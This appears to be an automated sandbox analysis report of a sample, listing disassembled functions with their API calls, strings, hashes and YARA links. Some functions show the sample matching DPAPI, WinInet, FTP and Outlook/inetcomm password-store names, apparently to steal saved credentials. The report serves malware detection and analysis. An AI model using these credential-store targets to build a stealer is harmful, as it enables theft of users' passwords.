_free.LIBCMT ref: 004514FB
_free.LIBCMT ref: 00451503
_free.LIBCMT ref: 00451509
_free.LIBCMT ref: 00451511
_free.LIBCMT ref: 0045151F

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 835356bab933c2cdc1ac7ef323f012145e9cf3a1c73374286c24045df14034f2
Instruction ID: 65c9b88ccd6b589af907b98cbacbdb8886646cd34a67ab890915773bc6e8b82c
Opcode Fuzzy Hash: 835356bab933c2cdc1ac7ef323f012145e9cf3a1c73374286c24045df14034f2
Instruction Fuzzy Hash: 37D1BE719002059FDB11DFB9C881BEEBBF4BF09305F14416EE895AB392D778A849CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00428CB6, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 141stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428CBB
lstrlenW.KERNEL32(?,?,?,?), ref: 00428CD5
lstrlenW.KERNEL32(?,?,?,?,?), ref: 00428CE2
StrCmpNW.SHLWAPI(?,DPAPI: ,00000007,?,?,?,?), ref: 00428CFC
StrCmpNW.SHLWAPI(?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428D0D
StrCmpNW.SHLWAPI(?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428D1E
lstrlenW.KERNEL32(?,?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428D54
lstrlenW.KERNEL32(?,?,?,ftp://,00000006,?,Microsoft_WinInet_,00000012,?,DPAPI: ,00000007,?,?,?,?), ref: 00428D85

Part of subcall function 004131B1: __EH_prolog.LIBCMT ref: 004131B6

Part of subcall function 0040FCA4: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040FCD2

Strings

DPAPI: , xrefs: 00428CF6
Microsoft_WinInet_, xrefs: 00428D07
ftp://, xrefs: 00428D18

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$H_prolog$Ios_base_dtorstd::ios_base::_
String ID: DPAPI: $Microsoft_WinInet_$ftp://
API String ID: 3832056751-2984799227
Opcode ID: 0dce92a5c0bec5463c72e28bef1b0986c927d8f344780410a0260837052a7bf8
Instruction ID: ada80f1f2248118b8c1e6dec9021a005663b45a95c6b9f1da52c308e200678cc
Opcode Fuzzy Hash: 0dce92a5c0bec5463c72e28bef1b0986c927d8f344780410a0260837052a7bf8
Instruction Fuzzy Hash: AC411A31A01358AADF14EBE9CC51BEEBB705F59344F4080AFE44477282DE786B49C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00434295, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00433962: lstrlenW.KERNEL32(?,?,004342FF), ref: 00433986
Part of subcall function 00433962: lstrcpyW.KERNEL32 ref: 0043399D
Part of subcall function 00433962: CoTaskMemFree.OLE32(?,?,004342FF), ref: 004339A6

lstrcmpiW.KERNEL32(00000000,identification,00000000), ref: 00434317
lstrcmpiW.KERNEL32(?,identitymgr), ref: 00434325
lstrcmpiW.KERNEL32(00000000,inetcomm server passwords), ref: 00434345
lstrcmpiW.KERNEL32(00000000,outlook account manager passwords), ref: 00434351
lstrcmpiW.KERNEL32(00000000,identities), ref: 0043435D
CoTaskMemFree.OLE32(?), ref: 00434393

Strings

inetcomm server passwords, xrefs: 0043433F
identities, xrefs: 00434357
identitymgr, xrefs: 0043431D
outlook account manager passwords, xrefs: 0043434B
identification, xrefs: 00434311

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi$FreeTask$lstrcpylstrlen
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 1606502731-4287852900
Opcode ID: 11251dbf3535e1d5886ed7d6d37592204cfd66824728e01002028863a5018a93
Instruction ID: 0ac2071c9c32447876bce63c5d225f7963a447b9772acc924ab0411aa981be65
Opcode Fuzzy Hash: 11251dbf3535e1d5886ed7d6d37592204cfd66824728e01002028863a5018a93
Instruction Fuzzy Hash: 83314F71A0021AEBDF119F95CD85AEF7B79EF88750F10401AFC04A3250DB78EA109AA9

Uniqueness

Uniqueness Score: -1.00%

Function 004588EF, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 00458B77

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: bea2ff366cffdcd75b504e2bd1549f4ff9bf6cc0d1506fc00624c64a8e8b4baa
Instruction ID: 3e29c098290310a3cdfd143a8b4255e197d271e7c31fd90a7f7b3a72d40502a9
Opcode Fuzzy Hash: bea2ff366cffdcd75b504e2bd1549f4ff9bf6cc0d1506fc00624c64a8e8b4baa
Instruction Fuzzy Hash: 83C1C5B09042459FDF12DF99C880BAEBBB5AF49306F04415EE900B7393CF789945CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004602D2, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00460340
_free.LIBCMT ref: 0046034C
_free.LIBCMT ref: 00460475
_free.LIBCMT ref: 00460480

Strings

@aH, xrefs: 004602FD

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: @aH
API String ID: 269201875-2335885206
Opcode ID: c85cba1f1b07674866229a9b9a9a9a03e97157cbebffae1a695fa95042c95d8d
Instruction ID: a4202ed44d2e3d64ef39492850553bb74fadb2201107e31c895516fb938d6441
Opcode Fuzzy Hash: c85cba1f1b07674866229a9b9a9a9a03e97157cbebffae1a695fa95042c95d8d
Instruction Fuzzy Hash: 8661C172904704AFDB20DF75C881BABB7E8AF44711F10456FE945AB282FB389C45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0043CA57, Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 0043CA6B
GetFileSize.KERNEL32(?,00000000,?,?), ref: 0043CAEB
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0043CB02
ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?), ref: 0043CB15
SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 0043CB22
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 0043CB35
SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 0043CB56
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?), ref: 0043CB69

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: f1fbf661825a080983591eecd65eb191705ad0c61c14623b972b3ed62e651999
Instruction ID: 2f91b937cd3dd233f620e1cf9dffd1f995a1331091074c1610abb146b68b7558
Opcode Fuzzy Hash: f1fbf661825a080983591eecd65eb191705ad0c61c14623b972b3ed62e651999
Instruction Fuzzy Hash: 8E5172B5A00218BBEB24DFA5DCD1BBFB7B9EB48700F15442AF906E7281D674AD008B54

Uniqueness

Uniqueness Score: -1.00%

Function 00442978, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00442A75
type_info::operator==.LIBVCRUNTIME ref: 00442A97
___TypeMatch.LIBVCRUNTIME ref: 00442BA6
IsInExceptionSpec.LIBVCRUNTIME ref: 00442C78
_UnwindNestedFrames.LIBCMT ref: 00442CFC
CallUnexpected.LIBVCRUNTIME ref: 00442D17

Strings

csm, xrefs: 00442A22
csm, xrefs: 00442ACE
csm, xrefs: 004429B5

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 3b41e2c3a6741d68ac91c4c9680948fb4cce187e49af0509451d79c3781ec3f9
Instruction ID: ede7239b5f42f59faad0f913251ce6ee1a895068404f870b8fdadb9dddeae28b
Opcode Fuzzy Hash: 3b41e2c3a6741d68ac91c4c9680948fb4cce187e49af0509451d79c3781ec3f9
Instruction Fuzzy Hash: F2B19C71800209EFEF25DFA5CA819AFBBB5FF04305B94415BF8016B212C7B8DA51CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A46A, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 280COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A46F

Part of subcall function 0040AB11: __EH_prolog.LIBCMT ref: 0040AB16

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Strings

+jHH, xrefs: 0042A5F3
?;#>, xrefs: 0042A6AA
JPV, xrefs: 0042A6E7
O) 7".&#a;*"?, xrefs: 0042A556
D^E_, xrefs: 0042A5FA
M+"5 ,$!c9( =, xrefs: 0042A5CC
(vl, xrefs: 0042A6B3
"\, xrefs: 0042A66F

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: "\$(vl$+jHH$?;#>$D^E_$JPV$M+"5 ,$!c9( =$O) 7".&#a;*"?
API String ID: 3708980276-2040310613
Opcode ID: 7ea4a14a50d7c26880466859e0f1a9ae909bdda8bc235371c8042acbb729f254
Instruction ID: a24ac063098ad5ddf8444769f80761f5302c2995f2add12281233b3d092cb00b
Opcode Fuzzy Hash: 7ea4a14a50d7c26880466859e0f1a9ae909bdda8bc235371c8042acbb729f254
Instruction Fuzzy Hash: E7C1D330E04258DBCF14EFA5D9917EDBBB1AF18308F5440AED44A77242EF781A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00456153, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00456169

Part of subcall function 00457085: HeapFree.KERNEL32(00000000,00000000,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?), ref: 0045709B
Part of subcall function 00457085: GetLastError.KERNEL32(?,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?,?), ref: 004570AD

_free.LIBCMT ref: 00456175
_free.LIBCMT ref: 00456180
_free.LIBCMT ref: 0045618B
_free.LIBCMT ref: 00456196
_free.LIBCMT ref: 004561A1
_free.LIBCMT ref: 004561AC
_free.LIBCMT ref: 004561B7
_free.LIBCMT ref: 004561C2
_free.LIBCMT ref: 004561D0

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 940a167c2d47dbf190a29dd6dd91c459525b6bf0a8148b486cde6813011b8862
Instruction ID: e184478f1a63851a451d7585c29fb1c37829856d73284c17b060c0b80500ccca
Opcode Fuzzy Hash: 940a167c2d47dbf190a29dd6dd91c459525b6bf0a8148b486cde6813011b8862
Instruction Fuzzy Hash: 7321ED76904108BFCB01EFA6D851CDE7BF5BF08745F00416AF9059B162DB39DA48CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0043C944, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 78COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0043C949

Strings

.arc, xrefs: 0043C99C
.tgz, xrefs: 0043C9E0
.zoo, xrefs: 0043C98B
.gz, xrefs: 0043C9CF
.lzh, xrefs: 0043C9AD
.zip, xrefs: 0043C97A
.arj, xrefs: 0043C9BE

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 4218353326-51310709
Opcode ID: 15bc3f7ab6d3c02ff42d4125ce7d68a7d365792184a1d796b595931408da5370
Instruction ID: 0073381b9aba9b695e0df17452f98984d6c603f593c2ffaaa2ac98b823414be1
Opcode Fuzzy Hash: 15bc3f7ab6d3c02ff42d4125ce7d68a7d365792184a1d796b595931408da5370
Instruction Fuzzy Hash: 8111869B248B53756A2531266CD7FBF06888F0B736B3B251FF808741C2EE4DA486426D

Uniqueness

Uniqueness Score: -1.00%

Function 0043F068, Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0043F0B1
__alloca_probe_16.LIBCMT ref: 0043F0DD
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0043F11C
LCMapStringEx.KERNEL32 ref: 0043F139
LCMapStringEx.KERNEL32 ref: 0043F178
__alloca_probe_16.LIBCMT ref: 0043F195
LCMapStringEx.KERNEL32 ref: 0043F1D7
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0043F1FA

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: a1b45b3f2bc49e0e15bab056394db84e8d8b9ebba7ef47fbae05e196e716a7da
Instruction ID: 000acb6c4f543f435341489ff8fb926010f535ef75589703cf0cf600600befcb
Opcode Fuzzy Hash: a1b45b3f2bc49e0e15bab056394db84e8d8b9ebba7ef47fbae05e196e716a7da
Instruction Fuzzy Hash: 6A51A072D0021AEBEF205F94DC44FAF3BA9EB48754F15417AFD1496260E7798C188B98

Uniqueness

Uniqueness Score: -1.00%

Function 00454E35, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 0045626B: GetLastError.KERNEL32(?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,?,7FFFFFFF,?,00000000,00413A66), ref: 00456270
Part of subcall function 0045626B: SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,?,7FFFFFFF,?,00000000), ref: 0045630E

_free.LIBCMT ref: 00455142
_free.LIBCMT ref: 0045515B
_free.LIBCMT ref: 00455199
_free.LIBCMT ref: 004551A2
_free.LIBCMT ref: 004551AE

Strings

C, xrefs: 00454F91

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: c82728a70593c1d201fbddf4e578db3481eac34e3ec674a83ba2820a7ce9d826
Instruction ID: 7564c953cf4fbd8791b3e8094dccce66789d7c6a684c956f5011c6ef07a879e8
Opcode Fuzzy Hash: c82728a70593c1d201fbddf4e578db3481eac34e3ec674a83ba2820a7ce9d826
Instruction Fuzzy Hash: 81B14A75A016199BDB24DF18C894BAEB7B4FF48305F1045EEE809A7392D735AE84CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0043E1E9, Relevance: 10.7, APIs: 7, Instructions: 190COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,00486F70,00000000), ref: 0043E28B
GetLastError.KERNEL32 ref: 0043E295
___std_fs_open_handle@16.LIBCPMT ref: 0043E2F5

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesErrorFileLast___std_fs_open_handle@16
String ID:
API String ID: 617199260-0
Opcode ID: 6356832f6f060a23d92c97b635dce7b4f2ec08ad900a14734218e92f9d863122
Instruction ID: e5f5f453d7be788bba3b7c8c220b8a4ae0bb97a5009cbab3322bf97598242091
Opcode Fuzzy Hash: 6356832f6f060a23d92c97b635dce7b4f2ec08ad900a14734218e92f9d863122
Instruction Fuzzy Hash: B8617171A017059BDB18CFAAC881BAB77B4BF09310F14526AEC61DB3C1E774E911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042314E, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 162COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00423153

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Strings

; expected , xrefs: 00423337
while parsing , xrefs: 00423199
; last read: ', xrefs: 0042322E
unexpected , xrefs: 004232D8
syntax error , xrefs: 00423170

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 3708980276-4239264347
Opcode ID: 82e3f390f1138bee8d33e58e95a6d44e89a6026945c64724bb67381b674899bb
Instruction ID: 4f9d85f418ae36473ad192b5fb0b476debd41c5afd8e5a62b0d6d5f50e0727f1
Opcode Fuzzy Hash: 82e3f390f1138bee8d33e58e95a6d44e89a6026945c64724bb67381b674899bb
Instruction Fuzzy Hash: AA616E70900258EFCF04EFA9C591BEDBBB5AF58314F54406EE105A3282DBB85B98CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0042705D, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00427062

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00427072, 00427082, 00427134, 00427175, 004271B7
not key_keep_stack.empty(), xrefs: 00427176
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 00427135
object_element, xrefs: 004271BC
not keep_stack.empty(), xrefs: 00427083

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: e3fa4ac29f86d7f73a15465130faf35563e7be364326350806a0d9f9298f29ab
Instruction ID: ac4c3075952e62fc1c48ed69161374d6ade2dd1c38e692a89a2561c531cdd0cd
Opcode Fuzzy Hash: e3fa4ac29f86d7f73a15465130faf35563e7be364326350806a0d9f9298f29ab
Instruction Fuzzy Hash: 275104307042109FDB04EF65D496FAA7BB4FF44314F84805EE905AF382DB78A954CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00426EAE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426EB3

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426EC3, 00426ED3, 00426F85, 00426FC6, 00427008
not key_keep_stack.empty(), xrefs: 00426FC7
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 00426F86
object_element, xrefs: 0042700D
not keep_stack.empty(), xrefs: 00426ED4

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: e689b58aa49bdd9daf3945d7e8e229f36dabe1f7b7705bad094c1bb0e63b096d
Instruction ID: 5743ed29e4fe9f29baa9c28d1e61ceb3cc6b244201378cc88db884384fa6a772
Opcode Fuzzy Hash: e689b58aa49bdd9daf3945d7e8e229f36dabe1f7b7705bad094c1bb0e63b096d
Instruction Fuzzy Hash: 465124307002109FDB04EF25D596BAA7BB4FF44314F85809EE805AF382DB78AD45CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00426BD5, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426BDA

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426BEA, 00426BFA, 00426C9F, 00426CE0, 00426D22
not key_keep_stack.empty(), xrefs: 00426CE1
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 00426CA0
object_element, xrefs: 00426D27
not keep_stack.empty(), xrefs: 00426BFB

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: b03c27dfa8c146f544caf7ba41d1df4967a44b85eec8dfcc4f39360c760786e5
Instruction ID: e6e22717c64b6ad87e73ad9e98f62c62b62aa39adb1fbeb6c737c3a11ca801da
Opcode Fuzzy Hash: b03c27dfa8c146f544caf7ba41d1df4967a44b85eec8dfcc4f39360c760786e5
Instruction Fuzzy Hash: 495105307002149FDB04EF26D491BA97BB5FF45314F94809EE8456B382DB78A944CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00442410, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00442447
___except_validate_context_record.LIBVCRUNTIME ref: 0044244F
_ValidateLocalCookies.LIBCMT ref: 004424D8
__IsNonwritableInCurrentImage.LIBCMT ref: 00442503
_ValidateLocalCookies.LIBCMT ref: 00442558

Strings

csm, xrefs: 004424ED

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b010cfcdbc579bef0c6cb9571e17f0f22c23f8da663f374d1c7ce666719b19ad
Instruction ID: 2470fdcd0b6fff71fb7958cc2c3a5f8570d24dc7195f5b4fd2d1cef2c530f427
Opcode Fuzzy Hash: b010cfcdbc579bef0c6cb9571e17f0f22c23f8da663f374d1c7ce666719b19ad
Instruction Fuzzy Hash: 7841F970A00108ABDF10DF69C944A9EBBB5EF45318F54805BFC14AB392D7B9DA01CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00460795, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 004604E1: _free.LIBCMT ref: 00460506

_free.LIBCMT ref: 004607E3

Part of subcall function 00457085: HeapFree.KERNEL32(00000000,00000000,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?), ref: 0045709B
Part of subcall function 00457085: GetLastError.KERNEL32(?,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?,?), ref: 004570AD

_free.LIBCMT ref: 004607EE
_free.LIBCMT ref: 004607F9
_free.LIBCMT ref: 0046084D
_free.LIBCMT ref: 00460858
_free.LIBCMT ref: 00460863
_free.LIBCMT ref: 0046086E

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 78165faf667097333fe48672aa076c468bd8a6105aaf0e1f748cab0ebcc6b7a1
Instruction ID: 1d19d1bbc6fe88f713d8a074dd3f9866101234b1d9971e57d98a9a8129159c91
Opcode Fuzzy Hash: 78165faf667097333fe48672aa076c468bd8a6105aaf0e1f748cab0ebcc6b7a1
Instruction Fuzzy Hash: AA117F71680B14AAD630BBB2CD1BFCF77DCAF00704F40482EF799660A2EAACF5444655

Uniqueness

Uniqueness Score: -1.00%

Function 0044E090, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,A:\_Work\rc-build-v1-exe\json.hpp,?), ref: 0044E0B0
GetFileType.KERNEL32(00000000), ref: 0044E0C2
swprintf.LIBCMT ref: 0044E0E3
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0044E120

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0044E0AA
Assertion failed: %Ts, file %Ts, line %d, xrefs: 0044E0D8

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: A:\_Work\rc-build-v1-exe\json.hpp$Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-3717751166
Opcode ID: c4c7844bac3ff80fd8fe6595112904c52887764795529367d0db0e344b5f2a16
Instruction ID: 1174ddf33052cf9365f3a9baea7bab53b6874899c428787a55929f80d73ad72e
Opcode Fuzzy Hash: c4c7844bac3ff80fd8fe6595112904c52887764795529367d0db0e344b5f2a16
Instruction Fuzzy Hash: 5F1108719001156BEB209B26DC849EFB3ACFF45314F50455BFD66A3181EA34AD458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00422EF8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMT ref: 00422F53
std::bad_exception::bad_exception.LIBCMT ref: 00422F63
std::bad_exception::bad_exception.LIBCMT ref: 00422F73
std::bad_exception::bad_exception.LIBCMT ref: 00422F96

Strings

false, xrefs: 00422F3C
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00422F37

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: A:\_Work\rc-build-v1-exe\json.hpp$false
API String ID: 2160870905-3678202009
Opcode ID: e9d4f505a443246c8aedaf316b3aa8a36c531a98f6e8dc733809d349e1cc5449
Instruction ID: 24d10f4ea94dfa4bdc72762182018c41247a20ba8bb001d9f3a2446b59b15276
Opcode Fuzzy Hash: e9d4f505a443246c8aedaf316b3aa8a36c531a98f6e8dc733809d349e1cc5449
Instruction Fuzzy Hash: D2115331740220B9C709EAA9FF0AFEF3630AB50304BA5820FB011325D9D5EC969AD31D

Uniqueness

Uniqueness Score: -1.00%

Function 00422FD0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

std::bad_exception::bad_exception.LIBCMT ref: 0042302B
std::bad_exception::bad_exception.LIBCMT ref: 0042303B
std::bad_exception::bad_exception.LIBCMT ref: 0042304B
std::bad_exception::bad_exception.LIBCMT ref: 0042306E

Strings

false, xrefs: 00423014
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042300F

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::bad_exception::bad_exception
String ID: A:\_Work\rc-build-v1-exe\json.hpp$false
